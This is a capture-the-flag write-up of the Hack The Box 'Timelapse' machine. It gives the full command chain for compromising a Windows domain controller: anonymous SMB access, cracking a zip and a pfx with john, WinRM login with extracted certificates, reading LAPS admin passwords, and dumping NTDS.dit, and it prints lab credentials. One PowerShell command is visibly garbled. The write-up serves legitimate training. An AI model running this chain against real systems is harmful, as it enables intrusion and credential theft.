# Timelapse

## Nmap

```
sudo nmap 10.10.11.152 -Pn -p- -sS -sV

PORT      STATE SERVICE           VERSION
53/tcp    open  domain            Simple DNS Plus
88/tcp    open  kerberos-sec      Microsoft Windows Kerberos (server time: 2022-07-02 14:42:07Z)
135/tcp   open  msrpc             Microsoft Windows RPC
139/tcp   open  netbios-ssn       Microsoft Windows netbios-ssn
389/tcp   open  ldap              Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ldapssl?
3268/tcp  open  ldap              Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp  open  globalcatLDAPssl?
5986/tcp  open  ssl/http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf            .NET Message Framing
49667/tcp open  msrpc             Microsoft Windows RPC
49673/tcp open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc             Microsoft Windows RPC
49696/tcp open  msrpc             Microsoft Windows RPC
58212/tcp open  msrpc             Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
```

Starting out we check anonymous logon with `smbmap`. Where we find that "Shares" share is read only access to us.

```bash
smbmap -H '10.10.11.152' -u 'a' -p '' -d 'timelapse.htb'
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FH10kCDtyN0oggGxotbw0%2Fimage.png?alt=media\&token=7d67130a-4ba4-431d-a042-f2d20c816b06)

Recursively searching the share with `smbmap` reveals to us that LAPS may be installed in the environment as well as the interesting file `winrm_backup.zip.`

```bash
smbmap -H '10.10.11.152' -u 'a' -p '' -d 'timelapse.htb' -r
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FVIUi0EOASIVtJk5Ka2ss%2Fimage.png?alt=media\&token=4ba77ba3-0fed-4bbc-955b-e6a86e3ed2e1)

Download the file:

```bash
smbmap -H '10.10.11.152' -u 'a' -p '' -d 'timelapse.htb' -R -A .zip
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FswewfvMcKWID0I9Q0vFB%2Fimage.png?alt=media\&token=084aaec8-5453-4568-9722-227d5a942321)

As the zip file is password protected we can utilize `zip2john` to hash the file and then crack it.

```bash
/usr/sbin/zip2john 10.10.11.152-Shares_Dev_winrm_backup.zip 
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FOZCl0a9vnDcGGbwVFr3D%2Fimage.png?alt=media\&token=cadb00cb-73a5-4fc7-acfb-86bf4981d153)

supplying john with you `rockyou.txt` word list we find the hash is cracked quickly.

```bash
sudo john --wordlist=/usr/share/wordlists/rockyou.txt winrmbackup.hash 
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FdkHBSokLcpr6TRx0hpqQ%2Fimage.png?alt=media\&token=d1e17a64-02fb-404f-9329-88d2e70380e8)

We are left with the file `legaccy_dev_auth.pfx`. A .pfx file is a certificate in PKCS#12 format.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FM1hw9qXtGN1XPAXG1S5e%2Fimage.png?alt=media\&token=54f64450-2628-459d-a779-9466c205827e)

Again, we need to hash the `.pfx` file and crack the password.

```bash
/usr/bin/pfx2john legacyy_dev_auth.pfx >> pfx.hash
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FtihvyosBOd7w92N7V9Mq%2Fimage.png?alt=media\&token=e49243ee-4d83-45d5-96c0-0ac53a950a95)

With the .pfx file we can now look at how we can connect to the target system. It is possible to connect over WinRM by providing a public certificate and a valid private key both of which can be extracted from .pfx files.

I used the following link for guidance on how to extract this information:

**URL:** <https://www.ibm.com/docs/en/arl/9.7?topic=certification-extracting-certificate-keys-from-pfx-file>

```bash
# Extract the private key
openssl pkcs12 -in [yourfile.pfx] -nocerts -out [drlive.key]

# Extract the certificate
openssl pkcs12 -in [yourfile.pfx] -clcerts -nokeys -out [drlive.crt]

# Decrypt the private key
openssl rsa -in [drlive.key] -out [drlive-decrypted.key]
```

**Note:** You may need to connect to a TCP OpenVPN configuration for the following to connect successfully.

```bash
 evil-winrm -i '10.10.11.152' -c 'drlive.crt' -k 'drlive-decrypted.key' -S -r 'timelapse.htb' 
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FtcPb7OCASHB89PGa0JeI%2Fimage.png?alt=media\&token=b7d5f5ae-4ca7-4528-aaac-43b86655ba39)

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F7jOWgeXePVadUiQZBnFs%2Fimage.png?alt=media\&token=3687f3de-972d-4588-91d0-6c1a368a73a7)

From here we look into the `ConsoleHost_History.txt` file and find credential information contained within.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FNhCO2XrWi7terrg2Zy6m%2Fimage.png?alt=media\&token=d0492547-cbce-4a1c-bdba-cf128ac6b467)

We now have the credentials for `svc_deploy:E3R$Q62^12p7PLlC%KWaxuaV`

```bash
evil-winrm -i '10.10.11.152' -u 'svc_deploy' -p 'E3R$Q62^12p7PLlC%KWaxuaV' -S -P 5986
```

Viewing the group memberships for our current user we see we are a member of "LAPS Readers".

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FiU5kV3htDZX7tcSwssh3%2Fimage.png?alt=media\&token=adaa93cd-1202-4db0-bb2e-c02ad65cd348)

Knowing this we can run the following `b` command to pull the local administrator password for the host DC01.

```powershell
Get-ADComputer -Filter * -Properties 'ms-Mcs-AdmPwd' | Where-Objee $null } | Select-Object 'Name','ms-Mcs-AdmPwd'
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F1y6oRsosdJ160Rqz6uSp%2Fimage.png?alt=media\&token=180f4fb1-64c6-48a6-9128-0c713a3946fe)

We are then able to use `Evil-WinRM` to authenticate against the target system with the LAPS password.

```bash
evil-winrm -i '10.10.11.152' -u 'administrator' -p '+K)HlT72oO(W6;W&402qD9LS' -S -P 5986
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fthl5RsXrkqiIL6UwvvRy%2Fimage.png?alt=media\&token=38a077dd-1efe-4f47-876f-4935636b2b9f)

Then grab the **root** flag.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FLxOUHwaSTQYlvgbvuFAo%2Fimage.png?alt=media\&token=48a013a8-753a-4674-acef-1536379f5582)

`Crackmapexec` has also been utilized with the credentials to dump the `NTDS.dit` hashes from the target system.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FguwpDTXRNraMzG9GV6QD%2Fimage.png?alt=media\&token=dece1079-2ca2-4c7b-836d-37231dca4010)